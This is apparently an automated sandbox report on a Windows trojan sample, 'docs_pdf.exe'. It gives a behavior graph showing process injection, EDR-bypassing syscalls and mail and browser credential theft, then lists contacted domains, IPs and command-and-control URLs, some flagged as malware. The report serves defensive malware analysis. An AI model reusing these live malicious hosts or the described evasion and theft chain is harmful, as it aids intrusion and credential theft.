            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472520 Sample: docs_pdf.exe Startdate: 13/07/2024 Architecture: WINDOWS Score: 100 28 www.xn--matfrmn-jxa4m.se 2->28 30 www.xn--fhq1c541j0zr.com 2->30 32 7 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 6 other signatures 2->48 10 docs_pdf.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 qsWkdNJOHuxNQUCXoUm.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 qsWkdNJOHuxNQUCXoUm.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.catherineviskadi.com 217.160.0.106, 49737, 49738, 49739 ONEANDONE-ASBrauerstrasse48DE Germany 22->34 36 www.xn--matfrmn-jxa4m.se 194.9.94.85, 49750, 49751, 49752 LOOPIASE Sweden 22->36 38 3 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            docs_pdf.exe45%ReversingLabsWin32.Trojan.Generic
            docs_pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se100%Avira URL Cloudmalware
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://i2.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH0%Avira URL Cloudsafe
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp100%Avira URL Cloudmalware
            http://www.xn--fhq1c541j0zr.com/rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://www.Bfiworkerscomp.com0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.xn--matfrmn-jxa4m.se
            		194.9.94.85
            		truetrue
              		unknown
              www.catherineviskadi.com
              		217.160.0.106
              		truetrue
                		unknown
                www.anuts.top
                		23.251.54.212
                		truetrue
                  		unknown
                  www.bfiworkerscomp.com
                  		208.91.197.27
                  		truetrue
                    		unknown
                    www.hprlz.cz
                    		5.44.111.162
                    		truefalse
                      		unknown
                      www.xn--fhq1c541j0zr.com
                      		43.252.167.188
                      		truetrue
                        		unknown
                        www.fourgrouw.cfd
                        		unknown
                        		unknowntrue
                          		unknown
                          www.hatercoin.online
                          		unknown
                          		unknowntrue
                            		unknown
                            www.tinmapco.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.xn--fhq1c541j0zr.com/rm91/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/xzzi/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.xn--matfrmn-jxa4m.se/4hda/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.xn--fhq1c541j0zr.com/rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.catherineviskadi.com/qe66/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.catherineviskadi.com/qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrptrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabclip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.xn--matfrmn-jxa4m.seqsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://cdn.consentmanager.netclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://static.loopia.se/responsive/images/iOS-72.pngclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/pics/28903/search.png)clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://static.loopia.se/shared/logo/logo-loopia-white.svgclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUHclip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.comclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://static.loopia.se/shared/images/additional-pages-hero-shape.webpclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://delivery.consentmanager.netclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://static.loopia.se/shared/style/2022-extra-pages.cssclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://static.loopia.se/responsive/images/iOS-114.pngclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://static.loopia.se/responsive/styles/reset.cssclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.Bfiworkerscomp.comclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUHclip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpfalse
